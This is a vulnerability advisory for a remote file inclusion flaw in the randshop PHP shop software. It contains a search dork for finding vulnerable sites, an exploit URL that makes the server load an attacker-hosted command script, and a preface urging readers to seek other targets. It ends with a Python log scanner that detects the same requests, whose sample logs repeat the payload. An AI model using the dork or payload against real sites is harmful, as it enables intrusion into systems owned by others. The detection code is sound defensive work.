This bug works on versions 1.1.1 and below, so if you get an error the admin has probably already patched it; try looking for another target.

---------------------------------------------------------------------------
randshop <= 1.1.1 Remote File Inclusion Vulnerability
---------------------------------------------------------------------------
dork : "software 2004-2005 by randshop"
Discovered By OLiBekaS : http://bekas.6te.net/vuln/rand.txt
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : randshop
version : 1.1.1
URL : http://www.randshop.com/
------------------------------------------------------------------
Exploit:
~~~~~~~~
Variable $dateiPfad
Example:
http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
------------------------------------------------------------------
Solution :
~~~~~~~~~~
Update to a higher version.
------------------------------------------------------------------
Contact:
~~~~~~~~
Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]com
Homepage: hTTp://bekas.6te.net
-------------------------------- [ EOF] ----------------------------------
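For site operators still running an affected version, the request shape in the advisory can be searched for in web server logs. The following is an added example, not part of the original advisory: it assumes combined-format access logs, the sample lines are constructed, and the "high"/"medium" labels are this example's own convention.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that make PHP's include() load non-local content (URL wrappers, //host).
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect):|^\s*//', re.I)
PARAM = "dateiPfad"                   # variable named in the advisory
SCRIPT = "/includes/header.inc.php"   # script named in the advisory

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253A) that hides the scheme."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def inspect_line(line):
    """Return (severity, decoded_value) for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = fully_decode(value)
        if name == PARAM and REMOTE_RE.search(value):
            # Assumption of this example: the advisory's script is "high",
            # the same parameter sent to any other script is "medium".
            on_script = fully_decode(target.path).lower().endswith(SCRIPT)
            return ("high" if on_script else "medium", value)
    return None

def scan(lines):
    """Return [(line_number, severity, decoded_value)] for every hit."""
    hits = ((n, inspect_line(l)) for n, l in enumerate(lines, 1))
    return [(n, *h) for n, h in hits if h]

# Constructed sample log lines using documentation-only addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /shop/index.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /shop/includes/header.inc.php?dateiPfad=http://203.0.113.9/cmd.txt?&cmd=ls HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /shop/includes/header.inc.php?dateiPfad=hTTp%253A%252F%252F203.0.113.9%252Fx.txt HTTP/1.0" 200 640',
    '192.0.2.44 - - [01/Jan/2007:10:01:00 +0000] "GET /shop/themes/x.php?dateiPfad=//203.0.113.9/x.txt HTTP/1.1" 404 300',
    '192.0.2.10 - - [01/Jan/2007:10:02:00 +0000] "GET /shop/includes/header.inc.php?dateiPfad=includes/ HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, severity, value in scan(SAMPLE_LOG):
        print(f"line {n}: {severity}: {PARAM}={value}")
```

A 200 response on a "high" hit means the script was reachable directly and warrants checking the host for follow-on activity, in addition to upgrading as the advisory recommends.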